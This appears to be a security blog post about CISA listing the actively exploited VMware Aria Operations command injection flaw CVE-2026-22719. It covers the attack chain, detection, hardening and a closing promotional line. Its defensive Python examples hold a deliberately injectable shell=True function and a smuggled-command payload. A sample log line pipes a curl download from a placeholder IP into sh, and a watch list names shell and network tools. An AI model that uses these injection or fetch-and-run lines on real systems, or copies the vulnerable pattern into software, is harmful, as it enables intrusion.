CISA Adds VMware Aria Operations RCE Flaw to KEV Catalog After Active Exploitation
CISA has added CVE-2026-22719 to its Known Exploited Vulnerabilities (KEV) catalog, confirming that a command injection flaw in VMware Aria Operations, which gives an authenticated attacker remote code execution on the appliance, is being actively exploited in the wild. Federal Civilian Executive Branch (FCEB) agencies are required to remediate it by March 18, 2026 under Binding Operational Directive 22-01.
The Vulnerability
CVE-2026-22719 is a command injection vulnerability (CWE-77) in VMware Aria Operations (formerly vRealize Operations) with a CVSS score of 8.1 (HIGH).
Key Details
| Attribute | Detail |
|---|---|
| CVE | CVE-2026-22719 |
| CVSS | 8.1 (HIGH) |
| CWE | CWE-77 (Command Injection) |
| Product | VMware Aria Operations |
| Vendor | Broadcom (VMware) |
| Advisory | Broadcom KB 430349 |
| KEV Added | March 3, 2026 |
| Patch Deadline | March 18, 2026 (FCEB agencies) |
VMware Aria Operations is a widely deployed infrastructure monitoring and management platform used across enterprise data centers and cloud environments. It provides performance monitoring, capacity planning, and workload optimization for VMware vSphere, Kubernetes, and multi-cloud deployments.
The command injection flaw allows an authenticated attacker with low-privilege access to execute arbitrary commands on the underlying operating system in the context of the Aria Operations service account. Because the platform typically runs with elevated privileges in order to manage infrastructure, successful exploitation gives the attacker effectively root-level control of the monitoring platform, and potentially of the credentials and configurations it manages.
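To make the CWE-77 mechanism concrete, here is an added, generic illustration in Python of the pattern behind command injection: the same operator-facing "diagnostics" action written once with user input spliced into a shell string and once with an argument vector plus an input allow-list. This is example code written for this article, not code from Aria Operations or from Broadcom's advisory, and it does not reproduce the actual CVE-2026-22719 code path (which the advisory summary here does not describe). The function names, the `echo`-based diagnostic action and the attacker payload are constructed for the example.

```python
"""Generic CWE-77 illustration (added example, not the CVE's real code path):
the same operation written with an injectable shell string and with an
argument vector. It shows why a single string supplied by a low-privileged,
authenticated user can reach OS command execution."""
import re
import subprocess

# Hypothetical "diagnostics" feature: echo which host an operator asked to
# check. Real monitoring tools wrap ping/traceroute/nslookup the same way.


def diag_vulnerable(hostname: str) -> str:
    # CWE-77: the user-controlled value is spliced into a shell command line,
    # so ';', '|', '$(...)' and backticks are interpreted by /bin/sh.
    cmd = "echo checking " + hostname
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


# Allow-list for the only input shape this feature should ever accept:
# DNS labels separated by dots, no shell metacharacters, no leading '-'.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def diag_hardened(hostname: str) -> str:
    # 1. Validate the input shape before it goes anywhere near a process.
    if not HOSTNAME_RE.match(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    # 2. Pass an argument vector: no shell parses the value, so any
    #    metacharacters are just bytes inside argv[2].
    out = subprocess.run(["echo", "checking", hostname],
                         capture_output=True, text=True)
    return out.stdout


# Constructed attacker input: a valid-looking host followed by an injected
# command. Against a real tool this would be e.g. '; id' or a reverse shell.
PAYLOAD = "vcenter01; echo INJECTED-$(id -u)"


def demo() -> dict:
    """Run both variants against the payload and a clean host name."""
    vuln = diag_vulnerable(PAYLOAD)
    try:
        diag_hardened(PAYLOAD)
        hard = "executed"
    except ValueError:
        hard = "rejected"
    return {
        "vulnerable_ran_injected_command": "INJECTED-" in vuln,
        "hardened_result": hard,
        "clean_host_ok": diag_hardened("vcenter01.corp.example").strip(),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable variant prints a second line produced by the injected command; the hardened variant refuses the payload outright and, even if the allow-list were bypassed, would only ever hand the string to `echo` as a single argument.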
Why This Is Critical
While the CVSS score of 8.1 might seem moderate compared to 9.8-rated vulnerabilities, several factors make CVE-2026-22719 particularly dangerous in practice:
1. Credential Goldmine
Aria Operations stores credentials for connecting to monitored infrastructure:
- vCenter Server administrator credentials
- ESXi host root credentials
- Cloud provider access keys (AWS, Azure, GCP)
- Database and application monitoring credentials
- LDAP/Active Directory service accounts
Compromising Aria Operations gives attackers a single pivot point to the entire virtualization and cloud infrastructure.
2. Low Barrier to Entry
The vulnerability requires only authenticated access with low privileges. In many deployments, Aria Operations has:
- Read-only accounts shared across operations teams
- Service accounts with predictable or default credentials
- LDAP-integrated authentication where any domain user can log in
3. Network Position
Aria Operations servers typically sit in management networks with broad connectivity to:
- vCenter Servers and ESXi hosts
- Kubernetes clusters
- Cloud management planes
- Network devices and storage arrays
This network position makes post-exploitation lateral movement straightforward.
4. Detection Blind Spot
Infrastructure monitoring platforms are rarely monitored themselves. Security teams focus on endpoints and servers but often exclude management tools from EDR coverage, creating a significant visibility gap.
Attack Scenario
Based on the vulnerability characteristics and typical deployment patterns, a realistic attack chain looks like:
Step 1: Gain authenticated access to Aria Operations
(compromised domain creds, default password, phishing)
Step 2: Exploit CVE-2026-22719 for command injection
→ OS-level command execution as the Aria Operations service account
Step 3: Extract stored credentials from Aria Operations database
→ vCenter admin, ESXi root, cloud provider keys
Step 4: Pivot to vCenter Server using extracted credentials
→ Full control of virtualization infrastructure
Step 5: Deploy ransomware/backdoors across all managed VMs
OR exfiltrate data from any managed workload
OR destroy infrastructure by deleting VMs and datastores
The entire chain from initial exploitation to full infrastructure compromise can be executed in minutes, not hours.
Affected Versions
Broadcom's advisory covers multiple versions of Aria Operations. Organizations should check:
- VMware Aria Operations (all versions prior to the patched release)
- VMware Cloud Foundation deployments that include Aria Operations
- vRealize Operations (the pre-rename product, if still in use)
Consult the Broadcom advisory KB 430349 for the exact version matrix and patched releases.
Defensive Recommendations
Immediate Actions (Do Today)
- Identify all Aria Operations instances in your environment — including those deployed by other teams or inherited from acquisitions
- Apply the Broadcom security patch immediately. This is not a "schedule for next maintenance window" situation — it's being actively exploited
- Restrict network access to the Aria Operations web interface. Only management workstations should reach it — not the entire corporate network
- Rotate all credentials stored in Aria Operations after patching. Assume they may have been extracted if exploitation occurred before patching
Detection and Hunting
Hunt for the following exploitation indicators:
1. Unusual process execution from the Aria Operations service. Monitor for child processes spawned by the Aria Operations Java process that don't match normal operational behaviour:
- bash / sh (or cmd.exe on Windows hosts) spawned by the Java process
- curl / wget (or certutil / PowerShell on Windows hosts) launched on the Aria Operations server
- Outbound connections from the management server to addresses outside the infrastructure it monitors
The Aria Operations appliance is Linux-based, so the Windows binaries above are relevant to hosts reached from it rather than to the appliance itself.
2. Credential access patterns. Alert on credential extraction:
- Database queries against the Aria Operations credential store
- API calls to retrieve stored passwords
- Bulk credential export operations
3. Lateral movement from the Aria Operations server. Monitor for authentication from the Aria Operations server IP to:
- vCenter Server (especially using admin credentials)
- ESXi hosts (especially over SSH)
- Cloud provider API endpoints
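As an added example (not part of the original post), the script below implements hunts 1 and 3 above as three rules run over a handful of constructed log events: shells and downloaders spawned by the Java process on the appliance, outbound flows from the appliance to peers it is not expected to talk to, and the appliance authenticating to vCenter as an administrator or to ESXi over SSH. The IP addresses, user names, the `key=value` event format and the RFC1918 "internal" check are assumptions for the example; adapt the constants and the parser to your own EDR, flow and authentication telemetry.

```python
"""Added hunting example (not from the original post). Runs the process,
network and lateral-movement hunts over CONSTRUCTED log events. Every host,
IP, user and the key=value log format is an assumption for this example."""
import ipaddress
import re
from collections import defaultdict

# --- Environment assumptions (constructed for the example) -----------------
ARIA_OPS_HOSTS = {"10.10.50.20"}                 # Aria Operations appliance
VCENTER_HOSTS = {"10.10.50.10"}
ESXI_HOSTS = {"10.10.51.11", "10.10.51.12"}
MONITORED_TARGETS = VCENTER_HOSTS | ESXI_HOSTS | {"10.10.60.5"}  # expected peers
ADMIN_USERS = {"administrator@vsphere.local"}
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "cmd.exe", "powershell.exe",
                       "curl", "wget", "certutil.exe", "python", "python3", "nc"}

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line: str) -> dict:
    """Parse one key=value event line; double-quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt_process(ev: dict):
    """Hunt 1: shells or downloaders spawned by the Aria Operations Java process."""
    if ev.get("host") not in ARIA_OPS_HOSTS:
        return None
    if basename(ev.get("parent", "")) != "java":
        return None
    child = basename(ev.get("image", ""))
    if child in SUSPICIOUS_CHILDREN:
        return f"java spawned {child}: {ev.get('cmdline', '')}"
    return None


def hunt_network(ev: dict):
    """Hunt 1b: outbound connections from the appliance to unexpected peers."""
    if ev.get("src") not in ARIA_OPS_HOSTS:
        return None
    dst = ev.get("dst", "")
    if dst in MONITORED_TARGETS:
        return None
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:
        return None
    scope = "internal" if any(ip in n for n in RFC1918) else "external"
    return f"outbound to {dst}:{ev.get('dport')} ({scope}, not a monitored target)"


def hunt_lateral(ev: dict):
    """Hunt 3: the appliance logging on to vCenter as admin or to ESXi over SSH."""
    if ev.get("src") not in ARIA_OPS_HOSTS:
        return None
    target, user, svc = ev.get("target"), ev.get("user"), ev.get("service")
    if target in VCENTER_HOSTS and user in ADMIN_USERS:
        return f"admin logon to vCenter {target} as {user}"
    if target in ESXI_HOSTS and svc == "ssh":
        return f"SSH logon to ESXi {target} as {user}"
    return None


HUNTS = {"process": hunt_process, "netflow": hunt_network, "auth": hunt_lateral}


def run_hunts(lines):
    """Return {event_type: [finding, ...]} for every line that fires a rule."""
    findings = defaultdict(list)
    for line in lines:
        ev = parse(line)
        hunt = HUNTS.get(ev.get("type"))
        if hunt is None:
            continue
        hit = hunt(ev)
        if hit:
            findings[ev["type"]].append(hit)
    return dict(findings)


# Constructed sample telemetry: benign noise plus a few hits.
SAMPLE_LOG = [
    "type=process host=10.10.50.20 parent=/usr/lib/jvm/bin/java image=/usr/bin/sh "
    "cmdline=\"sh -c 'curl http://203.0.113.7/a | sh'\"",
    "type=process host=10.10.50.20 parent=/usr/lib/jvm/bin/java image=/usr/bin/java "
    "cmdline=\"java -jar collector.jar\"",
    "type=process host=10.10.50.20 parent=/usr/sbin/sshd image=/usr/bin/bash cmdline=bash",
    "type=netflow src=10.10.50.20 dst=10.10.50.10 dport=443",
    "type=netflow src=10.10.50.20 dst=203.0.113.7 dport=80",
    "type=netflow src=10.10.50.20 dst=10.10.70.9 dport=22",
    "type=auth src=10.10.50.20 target=10.10.50.10 user=svc-aria-ro service=https",
    "type=auth src=10.10.50.20 target=10.10.50.10 user=administrator@vsphere.local service=https",
    "type=auth src=10.10.50.20 target=10.10.51.11 user=root service=ssh",
    "type=auth src=10.10.20.5 target=10.10.51.11 user=root service=ssh",
]

if __name__ == "__main__":
    for kind, hits in run_hunts(SAMPLE_LOG).items():
        for hit in hits:
            print(f"[{kind}] {hit}")
```

The benign lines (the collector JAR started by Java, an operator's SSH shell, the read-only service account logging on to vCenter, and an admin workstation using SSH to ESXi) produce no findings; the point of keeping the allow-lists small is that anything the appliance does outside its monitoring job stands out.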
Strategic Hardening
- Segment management networks — Aria Operations should be in a dedicated management VLAN with strict firewall rules
- Implement MFA for Aria Operations access — prevent compromised passwords from being sufficient
- Deploy EDR on management servers — don't exclude infrastructure tools from security monitoring
- Audit stored credentials regularly — minimize the number of credentials stored in monitoring platforms
- Enable audit logging — ensure all Aria Operations API calls and authentication events are forwarded to SIEM
The Broader VMware Threat Landscape
CVE-2026-22719 continues a pattern of VMware product vulnerabilities being actively exploited in the wild. Over the past few years:
- CVE-2025-22224/22225/22226: VMware ESXi, Workstation and Fusion vulnerabilities exploited as zero-days
- CVE-2024-37079/37080: vCenter Server heap overflow bugs actively exploited
- CVE-2023-34048: vCenter out-of-bounds write exploited by Chinese state actors
The trend is clear: VMware infrastructure is a high-priority target for both nation-state actors and ransomware groups. The combination of credential storage, network position, and infrastructure control makes VMware management tools an ideal pivot point.
Organizations running VMware environments should treat every VMware security advisory as urgent, not routine.
Need help auditing your VMware security posture? Apply to our Beta Tester Program at theinsider-x.com — limited slots available.